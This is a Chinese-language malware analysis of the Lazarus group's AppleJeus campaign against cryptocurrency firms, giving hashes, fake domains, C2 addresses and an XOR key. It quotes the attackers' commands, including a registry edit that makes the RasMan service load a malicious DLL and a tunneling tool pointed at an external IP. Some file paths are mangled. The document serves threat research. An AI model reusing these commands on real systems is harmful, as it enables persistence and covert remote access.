怎样进行AppleJeus行动分析

Lazarus组织是目前最活跃的APT组织之一。 2018年，卡巴斯基针发现由该组织发起的名为AppleJeus的攻击行动。该行动是Lazarus首次针对macOS用户的攻击，为了攻击macOS用户，Lazarus开发了macOS恶意软件并添加身份验证机制，其可以非常仔细谨慎的下载后一阶段的有效负载，并在不落盘的情况下加载下一阶段的有效负载。为了攻击Windows用户，他们制定了多阶段感染程序。在“ AppleJeus”行动分析发布后，Lazarus在进行攻击时变得更加谨慎，采用了更多多方法来避免被发现。

AppleJeus后续

发布AppleJeus行动分析后，Lazarus继续使用类似的作案手法来破坏加密货币业务，研究人员发现了更多与AppleJeus中的macOS恶意软件类似的恶意软件。该macOS恶意软件使用公共代码来开发安装程序。恶意软件使用了Centrabit开发的QtBitcoinTrader。

这三个macOS安装程序使用相似的后安装程序脚本植入有效负载，并在执行获取的第二阶段有效负载时使用相同的命令。此外还识别出的另一类型macOS恶意软件MarkMakingBot.dmg（be37637d8f6c1fbe7f3ffc702afdfe1d），该恶意软件创建于2019-03-12，但网络通信并未加密，推测这是macOS恶意软件改造升级的中间阶段。

Windows恶意软件的变化

持续跟踪此活动中发现一名受害者在2019年3月受到Windows AppleJeus恶意软件的攻击。确定感染始于名为WFCUpdater.exe的恶意文件，攻击者使用了一个假网站：wfcwallet [.] com。

攻击者像以前一样使用了多阶段感染，但是方法发生了变化。感染始于.NET恶意软件，其被伪装成WFC钱包更新程序（a9e960948fdac81579d3b752e49aceda）。此.NET文件执行后会检查命令行参数是否为“ / Embedding”。该恶意软件负责使用硬编码的20字节XOR密钥（82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62）解密同一文件夹中的WFC.cfg文件。其后连接到C2服务器：

wfcwallet.com (resolved ip: 108.174.195.134)

www.chainfun365.com(resolved ip: 23.254.217.53)

之后会执行攻击者的命令，安装下一阶段的有效负载。攻击者将两个文件放置到受害者系统文件夹中：rasext.dll和msctfp.dat。他们使用RasMan（远程访问连接管理器）Windows服务注册下一阶段有效负载。经过基本侦察后，攻击者使用以下命令手动植入有效载荷：

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc | findstr RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesRasManThirdParty /v DllName /d rasext.dll /f

为了建立远程隧道，攻击者使用命令行参数植入了更多的相关工具，但研究人员没有获得更多的工具文件。

Port opener:

%APPDATA%LenovodevicecenterDevice.exe 6378

Tunneling tool:

%APPDATA%LenovodevicecenterCenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

macOS恶意软件变化

JMTTrading

在跟踪此攻击活动时发现了macOS恶意软件变体。攻击者将其假网站和应用程序称为JMTTrading，其他研究人员和安全厂商也发布了其大量技术细节。在这里强调一下这次攻击的不同之处。

攻击者使用GitHub来托管其恶意应用程序。

恶意软件作者在其macOS恶意软件中使用了Object-C而不是QT框架。

该恶意软件在macOS可执行文件中实现了简单的后门功能。

与以前的情况类似，使用16字节XOR密钥加密/解密的恶意软件。

Windows版本的恶意软件使用了ADVobfuscator来隐藏其代码。

macOS恶意软件的安装脚本与以前的版本有显着差异。

UnionCryptoTrader

还确定了另一项针对macOS的攻击。恶意程序名为UnionCryptoTrader，安全研究员 dineshdina04发现了一个相同的案例，该攻击总结如下：

安装脚本与JMTTrading使用的脚本相同。

恶意软件作者使用SWIFT开发了此macOS恶意软件。

恶意软件作者更改了从收集信息的方法。

该恶意软件开始使用auth_signature和auth_timestamp参数进行身份验证，以便传递第二阶段有效负载。

该恶意软件无需落盘即可加载下一阶段的有效负载。

Windows版本的UnionCryptoTrader

研究人员找到了Windows版本的UnionCryptoTrader（0f03ec3487578cef2398b5b732631fec）。它是从Telegram Messenger下载并执行：

C:Users[user name]DownloadsTelegram Desk较好UnionCryptoTraderSetup.exe

此外在假网站上找到了攻击者的Telegram，可以高度确认攻击者使用Telegram Messenger发送安装程序。由于有效负载仅在内存中执行，因此无法获取所有相关文件。整个感染过程与WFCWallet非常相似，但是增加了注入过程。

Windows版本的UnionCryptoTrader具有以下窗口，显示几个加密货币的价格图表。

Windows版本的UnionCryptoTrader更新程序（629b9de3e4b84b4a0aa605a3e9471b31）与macOS版本功能相似。根据构建路径（Z:Loaderx64ReleaseWinloaderExe.pdb），恶意软件作者将此恶意软件称为加载程序。启动后，该恶意软件会检索受害者的基本信息，并以HTTP POST发送该信息。

如果C2服务器的响应为200，则恶意软件会解密有效负载并将其加载到内存中。最后恶意软件发送act=done。从此加载程序下载的下一阶段有效负载（e1953fa319cc11c2f003ad0542bca822）与WFCWallet的.NET下载程序相似。该恶意软件负责解密同一文件夹中的Adobe.icx文件，将下一个有效负载注入Internet Explorer进程，并执行攻击者的命令。

最终的有效载荷（dd03c6eb62c9bf9adaf831f1d7adcbab）与WFCWallet相同是通过手动植入的。恶意软件作者根据先前收集的信息植入仅在特定系统上有效的恶意软件。该恶意软件会检查受感染系统的信息，并将其与给定值进行比较。